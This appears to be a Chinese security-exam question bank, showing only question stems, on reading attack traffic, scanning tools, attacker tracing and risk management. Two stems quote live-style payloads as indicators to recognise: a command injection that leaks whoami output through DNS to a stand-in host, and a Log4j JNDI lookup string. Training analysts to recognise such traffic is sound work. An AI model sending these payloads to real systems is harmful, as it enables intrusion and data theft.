单项选择题 网络数据包中出现ping `whoami`.aaa.dnslog.com，攻击者最有可能的目的是哪项（）

单项选择题 网络数据包中出现新增jsp、php、aspx脚本语言文件的加密流量，说明攻击者有可能正在进行哪项操作（）

单项选择题 网络数据包中出现wget、curl等字眼时，说明攻击者最有可能采取以下哪种漏洞攻击（）

单项选择题 在攻击数据包中，出现select、database（）、user（）、version（）等字眼，可能是以下哪种攻击（）

单项选择题 在攻击数据包中，出现@type的字眼，可能是以下哪种攻击（）

单项选择题 数据包Cookie中带有rememberMe字样，说明此系统最有可能使用了什么框架组件（）

单项选择题 通过以下哪个平台，可以在不对攻击IP进行端口扫描的前提下，初步获取到该IP的端资产信息（）

单项选择题 以下哪种方式可以加快溯源到攻击者的社交软件ID（）

单项选择题 在攻击数据包中，出现${jndi：ldap：//111.xxx.io}的字眼，可能是以下哪种攻击（）

单项选择题 在攻击数据包中，频繁出现单引号’，双引号"，and，or之类的字眼，可能是以下哪种攻击（）

单项选择题 Nmap使用什么参数进行脚本调用（）

单项选择题 awvs用来除了用来漏扫还能做什么（）

单项选择题 在fofa搜索中，下面哪个是从url搜索的语句（）

单项选择题 aspx的网站配置文件一般存放在哪个文件（）

单项选择题 NMAP工具主要有什么功能（）

单项选择题 服务器上存在的那些文件应该及时删除，否则可能造成信息泄露（）

单项选择题 下面不是收集子域名的工具是（）

单项选择题 在Linux操作系统中，命令（）可以正确关闭系统防火墙。

问答题 在组织选择并实施风险评估结果中推荐的安全措施之前，首先要明确自己的风险消减策略，也就是应对各种风险的途径和决策方式。请简述风险控制的主要策略。

问答题 请简述信息安全管理的基本原则。